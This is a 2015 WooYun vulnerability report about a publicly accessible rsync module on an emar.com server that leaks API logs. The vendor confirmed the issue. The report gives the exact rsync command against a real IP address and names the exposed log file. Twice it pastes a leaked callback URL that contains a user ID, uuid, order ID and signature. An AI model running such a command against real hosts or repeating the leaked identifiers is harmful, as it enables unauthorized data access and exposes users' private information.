漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0157620
漏洞标题:亿玛在线某服务器rsync泄露敏感信息
相关厂商:emar.com
漏洞作者: Aug0st
提交时间:2015-12-02 16:36
修复时间:2016-01-16 16:48
公开时间:2016-01-16 16:48
漏洞类型:系统/服务运维配置不当
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-02: 细节已通知厂商并且等待厂商处理中
2015-12-02: 厂商已经确认,细节仅向厂商公开
2015-12-12: 细节向核心白帽子及相关领域专家公开
2015-12-22: 细节向普通白帽子公开
2016-01-01: 细节向实习白帽子公开
2016-01-16: 细节向公众公开
简要描述:
rt
详细说明:
地址:rsync -av 221.122.127.175::channel
channel模块可访问,并且泄露重要日志信息
打开sys/escore_api.log,
由此可以看出此地址是emar的,并且结合前面的注入,这个escore是注那个易积分那个数据库名,
泄露用户访问信息:
http://b.wlanplus.com/cpa/escoreAndroidCallBack?uuid=2d6191c4dd0c1d134b5a16f65b151e84&userID=36026170-6381561&score=20&exchangetime=2015-11-27+17%3A20%3A30&plat=0&appName=%E7%95%85%E6%97%A0%E7%BA%BF&idfa=&adId=14388&adName=%E4%B9%90%E8%9C%82%E7%BD%91&packageName=com.yek.lafaso&order_id=2d6191c4dd0c1d134b5a16f65b151e8414388&signNum=1&appChildId=&appChildName=&sign=43628332fa8d07f3326c9bea8551a1e1
漏洞证明:
地址:rsync -av 221.122.127.175::channel
channel模块可访问,并且泄露重要日志信息
打开sys/escore_api.log,
由此可以看出此地址是emar的,并且结合前面的注入,这个escore是注那个易积分那个数据库名,
泄露用户访问信息:
http://b.wlanplus.com/cpa/escoreAndroidCallBack?uuid=2d6191c4dd0c1d134b5a16f65b151e84&userID=36026170-6381561&score=20&exchangetime=2015-11-27+17%3A20%3A30&plat=0&appName=%E7%95%85%E6%97%A0%E7%BA%BF&idfa=&adId=14388&adName=%E4%B9%90%E8%9C%82%E7%BD%91&packageName=com.yek.lafaso&order_id=2d6191c4dd0c1d134b5a16f65b151e8414388&signNum=1&appChildId=&appChildName=&sign=43628332fa8d07f3326c9bea8551a1e1
修复方案:
验证
版权声明:转载请注明来源 Aug0st@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2015-12-02 16:47
厂商回复:
@Aug0st 多谢提供信息
最新状态:
暂无